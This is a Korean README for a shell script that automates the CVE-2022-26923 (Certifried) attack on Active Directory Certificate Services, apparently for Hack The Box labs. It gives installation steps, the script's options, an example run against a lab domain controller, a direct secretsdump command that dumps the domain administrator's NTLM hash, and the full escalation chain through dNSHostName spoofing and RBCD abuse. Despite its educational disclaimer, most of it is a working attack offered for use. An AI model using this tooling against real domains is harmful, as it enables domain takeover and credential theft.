
CVE-2022-26923 악용
CVE-2022-26923 (Certifried) 익스플로잇 자동화. Active Directory Certificate Services (AD CS) 및 Resource-Based Constrained Delegation (RBCD) 남용을 통한 권한 상승을 가능하게 하며, 도메인 관리자 계정의 NTLM 해시 덤프로 이어집니다.
⚠️ 교육 목적으로만 사용 / Lab / HTB
허가되지 않은 환경에서 사용하지 마십시오.
이 스크립트는 다음과 같은 공격 체인을 자동화합니다.
dNSHostName 수정administrator용 Kerberos 티켓 획득secretsdump.py를 통한 NTLM 덤프certipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]
-d, --dc-ip 도메인 컨트롤러 IP
-D, --domain 도메인 이름
-u, --user 유효한 사용자
-p, --pass 사용자 비밀번호
-c, --comp-name 제어된 머신 이름
-C, --comp-pass 머신 비밀번호
-a, --ca-name 인증 기관(CA) 이름
-t, --template 인증서 템플릿
-f, --pfx-file PFX 파일 이름
-H, --dc-hostname DC 호스트명
-A, --dc-account DC 계정
-i, --impersonate 가장할 대상 계정
--verbose 디버그 모드
-h, --help 도움말
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
실행 종료 후:
administrator.ccacheadministrator 계정의 NTLM 덤프Kerberos 문제 발생 시:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
Machine Account Creation
↓
dNSHostName spoofing
↓
Certificate Request (Machine Template)
↓
Authentication via PFX
↓
RBCD abuse (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
Kerberos Ticket extraction
↓
NTLM dump via secretsdump
이 프로젝트는 다음 목적으로 제공됩니다:
저자는 허가되지 않은 사용에 대해 책임을 지지 않습니다.
MIT